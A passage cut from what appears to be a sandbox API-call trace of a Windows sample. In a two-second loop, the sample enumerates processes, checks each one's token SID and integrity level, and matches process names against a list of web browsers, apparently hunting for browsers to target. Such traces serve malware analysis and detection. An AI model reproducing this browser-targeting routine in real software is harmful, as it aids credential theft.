CloseHandle (hObject=0x5a4) returned 1 [0480.451] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0480.451] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0480.451] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0480.451] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0480.451] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0480.451] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0480.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0480.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0480.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0480.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0480.461] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0480.461] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0480.461] GetLastError () returned 0x7a [0480.461] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0480.461] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0480.461] CloseHandle (hObject=0x3bc) returned 1 [0480.461] CloseHandle (hObject=0x5a4) returned 1 [0480.461] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0480.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0480.461] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376e10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">y") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0480.461] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0480.461] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0480.461] GetLastError () returned 0x7a [0480.461] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0480.461] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0480.461] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0480.461] CloseHandle (hObject=0x3bc) returned 1 [0480.461] CloseHandle (hObject=0x5a4) returned 1 [0480.461] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0480.461] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0480.461] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0480.461] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0480.461] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0480.461] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0480.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0480.461] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0480.462] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0482.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa4c8) returned 0xc0000004 [0482.469] VirtualAlloc (lpAddress=0x0, dwSize=0xb4c8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0482.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb4c8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0482.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0482.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0482.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0482.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0482.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0482.473] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0482.473] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0482.473] GetLastError () returned 0x7a [0482.473] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0482.473] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0482.473] CloseHandle (hObject=0x3bc) returned 1 [0482.474] CloseHandle (hObject=0x5a4) returned 1 [0482.474] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0482.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0482.474] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x378028, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">z") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0482.474] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0482.474] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0482.474] GetLastError () returned 0x7a [0482.474] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0482.474] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0482.474] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0482.474] CloseHandle (hObject=0x3bc) returned 1 [0482.474] CloseHandle (hObject=0x5a4) returned 1 [0482.474] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0482.474] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0482.474] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0482.474] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0482.474] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0482.474] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0482.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0482.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0482.474] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0482.474] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0482.475] GetLastError () returned 0x7a [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0482.475] CloseHandle (hObject=0x3bc) returned 1 [0482.475] CloseHandle (hObject=0x5a4) returned 1 [0482.475] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0482.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0482.475] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375b60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">{") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0482.475] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0482.475] GetLastError () returned 0x7a [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0482.475] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0482.475] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0482.475] CloseHandle (hObject=0x3bc) returned 1 [0482.475] CloseHandle (hObject=0x5a4) returned 1 [0482.475] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0482.475] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0482.475] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0482.475] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0482.475] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0482.475] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0482.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0482.475] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0482.475] GetLastError () returned 0x7a [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0482.475] CloseHandle (hObject=0x3bc) returned 1 [0482.475] CloseHandle (hObject=0x5a4) returned 1 [0482.475] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0482.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0482.475] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376320, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">|") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0482.475] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0482.475] GetLastError () returned 0x7a [0482.475] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0482.475] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0482.476] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0482.476] CloseHandle (hObject=0x3bc) returned 1 [0482.476] CloseHandle (hObject=0x5a4) returned 1 [0482.476] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0482.476] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0482.476] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0482.476] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0482.476] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0482.476] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0482.476] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0482.476] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0482.476] GetLastError () returned 0x7a [0482.476] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0482.476] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0482.476] CloseHandle (hObject=0x3bc) returned 1 [0482.476] CloseHandle (hObject=0x5a4) returned 1 [0482.476] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0482.476] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376968, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">}") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0482.476] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0482.476] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0482.476] GetLastError () returned 0x7a [0482.476] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0482.476] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0482.476] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0482.476] CloseHandle (hObject=0x3bc) returned 1 [0482.476] CloseHandle (hObject=0x5a4) returned 1 [0482.476] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0482.476] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0482.476] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0482.476] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0482.476] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0482.476] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0482.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0482.476] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0482.477] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0482.477] GetLastError () returned 0x7a [0482.477] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0482.477] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0482.477] CloseHandle (hObject=0x3bc) returned 1 [0482.477] CloseHandle (hObject=0x5a4) returned 1 [0482.477] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0482.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0482.477] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376d10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">~") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0482.477] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0482.477] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0482.477] GetLastError () returned 0x7a [0482.477] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0482.477] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0482.477] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0482.477] CloseHandle (hObject=0x3bc) returned 1 [0482.477] CloseHandle (hObject=0x5a4) returned 1 [0482.477] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0482.477] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0482.477] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0482.477] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0482.477] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0482.477] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0482.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0482.477] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0482.477] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0484.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa478) returned 0xc0000004 [0484.481] VirtualAlloc (lpAddress=0x0, dwSize=0xb478, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0484.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb478, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0484.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0484.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0484.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0484.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, 